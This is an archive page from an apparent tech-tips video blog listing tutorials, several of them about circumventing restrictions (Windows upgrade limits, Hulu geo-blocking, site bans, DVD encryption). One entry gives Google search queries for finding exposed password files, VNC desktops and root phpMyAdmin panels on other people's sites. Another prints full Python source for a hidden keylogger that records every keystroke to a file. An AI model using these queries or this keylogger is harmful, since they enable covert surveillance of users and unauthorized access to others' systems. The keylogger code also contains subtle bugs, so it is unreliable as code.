This video covers two hacks to get around Windows 7 upgrade limitations. One is a hack that lets you upgrade from the Windows 7 Release Candidate (Beta version) and the other hack allows you to upgrade to a downgraded Windows Edition (ex. Vista Ultimate to Windows 7 Professional).
-
Windows 7 Upgrade Hacks
// davisde // Hacks, Software Tips Tags: 7, beta, Hacks, install, microsoft, professional, tips, tricks, tutorial, ultimate, windows, work 9 Responses
This video covers two hacks to get around Windows 7 upgrade limitations. One is a hack that lets you upgrade from the Windows 7 Release Candidate (Beta version) and the other hack allows you to upgrade to a downgraded Windows Edition (ex. Vista Ultimate to Windows 7 Professional). -
How To Hack Bluetooth Headsets
// davisde // DIY Projects, Hacks, Safety & Security Tags: bluetooth, cell, hack, hacking, mobile, sonar, tinkernut, tips, tricks, tutorial, wireless 9 Responses
This video shows one of the vulnerabilities of some bluetooth headsets. To prevent this vulnerability, it’s best to invest a little more money into a more secure headset and making sure your headset is turned off when not in use. You can find all of the links and scripts used in this video, as well as find answers to questions you may have at the link below:http://www.tinkernut.com/groups/videotutorial-extras/forum/topic/how-to-hack-bluetooth-headsets/
-
Convert DVD’s to iPod for free
// davisde // DIY Projects, Hacks, Multimedia Tips, Software Tips Tags: convert, dvd, free, freeware, hack, ipod, media, movies, player, portable, software, tips, tricks, tutorial, Video 6 Responses
This video will show you some free programs to use for converting DVD’s to play on iPod’s or other portable media devices. For all the links used in this video, as well as alternatives for Mac users, please refer to the link below:
This video will show you some free programs to use for converting DVD’s to play on iPod’s or other portable media devices. You can find the links to the software used in the video below:
DVD Fab (free) -http://www.dvdfab.com/free.htm
Handbrake (free) – http://handbrake.fr/?article=download
iTunes (free) – http://www.apple.com/itunes/download/
FOR MAC USERS: As I do not have a Mac, I cannot test this method, but a free program to remove dvd encryption is MacTheRipper. Once it has ripped the DVD to your computer, you can then use Handbrake to convert it as shown in the video.
-
Two Cool Hulu Tricks
// davisde // Cool Websites, Hacks, Multimedia Tips, Web Tips Tags: anywhere, download, Hacks, hulu, ip, online, proxy, tips, tricks, tutorial, Video 6 Responses
This video covers two programs, IP Hider (free trial) and Hulu Video Downloader (freeware). IP Hider allows you to access Hulu from anywhere in the world and Hulu Video Downloader allows you to download Hulu programming to your computer. Hulu Video Downloader is only available in the US.IP Hider – http://www.allanonymity.com/ip-hider-hide-ip-software
Hulu Video Downloader – http://www.downloadtoolz.com/hulu/ -
Google Hacks
// davisde // Hacks, Safety & Security, Web Tips Tags: 2.0, control, engine, google, hack, Hacks, instructional, passwords, php, search, tinkernut, tutorial, website 15 Responses
This tutorial shows you security issues with Google that can allow you to hack other people’s sites. Use this video to make sure your site is secure.PAGES THAT CAN’T BE SEARCHED
“robots.txt” “disallow:” filetype:txtFTP PASSWORD HASHES
intitle:index of ws_ftp.iniintitle:”index of” passwd passwd.bak
FRONT PAGE HACK
inurl:_vti_pvt “service.pwd”PHP PHOTO ALBUMS
inurl:”phphotoalbum/upload”VNC HACK
“vnc desktop” inurl:5800 ….all the way up to 5806PRINTER CONTROL PANELS
intext”UAA(MSB)” Lexmark -ext:pdfinurl:”port_255″ -htm
PHP ADMINS
intitle:phpMyAdmin “Welcome to phpMyAdmin ***” “running on * as root@*”
-
How To Make A Keylogger
// davisde // Hacks, Programming Tips Tags: computer, hack, hacking, keyboard, keylogger, programming, python, scripts, tinkernut, tips, tricks, tutorial 38 Responses
KEYLOGGER SOURCECODE AND
– Download Python: http://www.python.org/
– Download Pyhook: pyhook.sourceforge.net
– Download Python for Windows Extensions: http://sourceforge.net/projects/pywin32/
SOURCE:
import win32api import win32console import win32gui import pythoncom, pyHook win = win32console.GetConsoleWindow() win32gui.ShowWindow(win,0) def OnKeyboardEvent(event): if event.Ascii==5: _exit(1) if event.Ascii != 0 or 8: f=open('c:output.txt','r') buffer=f.read() f.close() f=open('c:output.txt','w') keylogs=chr(event.Ascii) if event.Ascii==13: keylogs='/n' buffer += keylogs f.write(buffer) f.close() hm = pyHook.HookManager() hm.KeyDown = OnKeyboardEvent hm.HookKeyboard() pythoncom.PumpMessages()
-
Hacking Tip: Change Your MAC Address
// davisde // Hacks Tags: address, block, bypass, change, game, hack, hacking, hide, ip, mac, sites, tips, tricks, tutorial, website 3 Responses
This video will show you how to bypass websites that have blocked you by changing your MAC address, which will change your IP address. You can download now download it from this link: http://www.tinkernut.com/demos/205_mac/macmakeup195d.zip
-
Howcast & Tinkernut: How To Dust For Fingerprints
// davisde // DIY Projects, Hacks, Multimedia Tips, Video Tags: diy, forensics, Howcast & Tinkernut, projects, science, tips, tricks, tutorial 1 Response
This is a tutorial I made for Howcast.com. It shows how to dust for fingerprints using household items.
-
Cool Wiimote Tricks Using A PC
// davisde // Gaming, Hacks, Video Tags: computer, hack, mouse, pc, reality, remote, screen, tips, touch, touchscreen, tricks, tutorial, virtual, wii 7 Responses
This video shows you how to connect a Wii remote to a PC and some different tips and tricks you can do with it. For all links and websites used in the video, please visit the URL below:
-
How To Play Console Games On Your PC
// davisde // Gaming, Hacks, Video Tags: emulator, Gaming, hack, mario, nintendo, pc, tips, tricks, tutorial, wii, xbox 15 Responses
This video shows you methods for emulating some of the major console games on your PC, such as Atari, NES, PS2, Xbox, N64 and Wii. For questions, comments and all of the links used in this video, please visit the forum link below.